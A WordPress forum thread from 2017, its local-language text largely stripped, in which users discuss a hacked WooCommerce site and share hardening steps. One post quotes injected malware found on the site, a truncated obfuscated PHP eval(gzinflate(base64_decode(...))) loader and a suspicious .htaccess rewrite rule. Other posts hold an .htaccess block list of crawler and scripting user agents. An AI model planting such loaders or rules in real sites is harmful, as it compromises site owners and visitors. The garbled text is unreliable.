Thread: Wordpress
-
7th August 2017 09:05 #1
Wordpress
, - - .

, woocommerce. , , wordpress. 4.6.7. , - 4.7.2, .
, , , (4.8.1) ..., .
, , ( ). , (), , . , - 12 .
, ( ), . .
, brute force /xmlrpc.php /wp-login.php
. .
, , ., , .
...
-
7th August 2017 10:56 #2
wordpress, '', -! global , "" "" , () ..., 5-6 .
.
(. ) login, 5 . ....
, login, ( 12 )?
-
7th August 2017 10:59 #3
, . phpmail WP.
6-7 .
:
.htaccess
( https://www.smashingmagazine.com/201...ns-ownerships/ )
!
-
7th August 2017 13:07 #4
1- .
cPanel .
, /xmlrpc.php /wp-login.php.
.
- Wordpress
- Wordpress.
readme.html, license.txt, wp-config-sample.php
- Login Lockdown 5 IP, 5 .
180 .
- "honeypot" () , .
- 404
- Trace Track
- 6G/5G blacklist
-
- -
- wp-config.php wordpress
- wp-config.php public-html,
- wp-admin.php e .htaccess IP
- .htaccess public-html Script Injections, xmlrpc.php
- ,
- , ,
<IfModule mod_setenvif.c>
SetEnvIfNoCase User-Agent ^$ keep_out
SetEnvIfNoCase User-Agent (casper|cmsworldmap|diavol|dotbot) keep_out
SetEnvIfNoCase User-Agent (flicky|ia_archiver|jakarta|kmccrew) keep_out
SetEnvIfNoCase User-Agent (purebot|comodo|feedfinder|planetwork) keep_out
SetEnvIfNoCase User-Agent (libwww|planetwork|pycurl|skygrid) keep_out
SetEnvIfNoCase User-Agent (purebot|comodo|feedfinder|turnit) keep_out
SetEnvIfNoCase User-Agent (zmeu|nutch|vikspider|binlar|sucker) keep_out
<Limit GET POST PUT>
Order Allow,Deny
Allow from all
Deny from env=keep_out
</Limit>
</IfModule>
, 26 .
wordpress (/wp-login), admin.
Brute Force /wp-login.php admin , , .
, . ip- .
, , .
.
, wordpress , . , .
?phpmail WP.
Name File/Folder Current Permissions Recommended Permissions
root directory /public_html/ 0755 0755 No Action Required
wp-includes/ /public_html/wp-includes 0755 0755 No Action Required
.htaccess /public_html/.htaccess 0644 0644 No Action Required
wp-admin/index.php /public_html/wp-admin/index.php 0644 0644 No Action Required
wp-admin/js/ /public_html/wp-admin/js/ 0755 0755 No Action Required
wp-content/themes/ /public_html/wp-content/themes 0755 0755 No Action Required
wp-content/plugins/ /public_html/wp-content/plugins 0755 0755 No Action Required
wp-admin/ /public_html/wp-admin 0755 0755 No Action Required
wp-content/ /public_html/wp-content 0755 0755 No Action Required
wp-config.php /wp-config.php 0644 0644 No Action Required
Last edited by MegatroniC; 7th August 2017 at 13:11.
, , .
...
-
7th August 2017 13:34 #5
-
7th August 2017 14:14 #6
detectify
.
/xmlrpc.php webserver-a (403 Forbidden) ( )
wp-login.php Rename wp-login.php .
wp-login.php (90 % )
Last edited by rumenchooo; 7th August 2017 at 15:00.
-
7th August 2017 14:20 #7
1. . ( 3:34 , , )
2. htaccess " RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.jpds$ new.php?$1=$2-$3 [L] " ??
3. "eval(gzinflate(base64_decode(' " ( " <?php
@error_reporting(0);
@set_time_limit(0);
eval(gzinflate(base64_decode('5b1rV9vIEi j6OXut/R86Gu+RPTHGNkkmMZhACCQQAhmeeZDjkW3ZVpAtj SRjSIb/fqqqH2q9jElm77PuumQF7O7q6upXdXV1dVXJmkaj jm+F4cwL+qzNDGP13/8q9TzXC/DbL/3BE0rp2wNr6kYdqxc53gSyzB3HtcN31sTUs6eh3b G+WtcAEAVTW8/qjawgtCMseu5M+t4sXGo0nzSw+L//5QzKD+2xH92US53j7aOz7aPP5puTk/edU/jW2Xy9fXBifqlU2Pd//4vBTwnqCTaH9iQKAZ8VBNZN2XjteUPXNqrMOHang Y8f3h0fvPQi/ORYHSvojZwrO8CvH61J377GT0fWuOtCYmWVowZK/MAedsZW1BuVzWWT1Zgz9l2vb5fNv82qXncF8sxlB xMXoRp/RrbVt4MygS03anX2uP6YHXgR2/Gmk74pqcAf+9qJxNfbf//rFrtpI7TDEPq/E0ZWEJUResOZOB3o17JpB4EXdFxvaFYPTvf3k5mQ 3CGA0KzWk1lj67pjX9u9KY5sJ3LGtgSBb... "
, 15 2016 17 2017 ( ). .
:
1. ? , , .. ?
-
7th August 2017 15:32 #8
@ skrubalov, , cPanel-a . . .. , .
htaccess , - , .
, , php .3. "eval(gzinflate(base64_decode('
.:
1. ? , , .. ?
, , .
, .
, ...
. .
.
:
ip: 46.119.112.177
: - /products/ /
: 8/7/17, 3:06 PM
: 1139
URL : chatr0ulette.v1de0/ ( , )
, public_html, /9288
, ip- .
. , ., , .
...



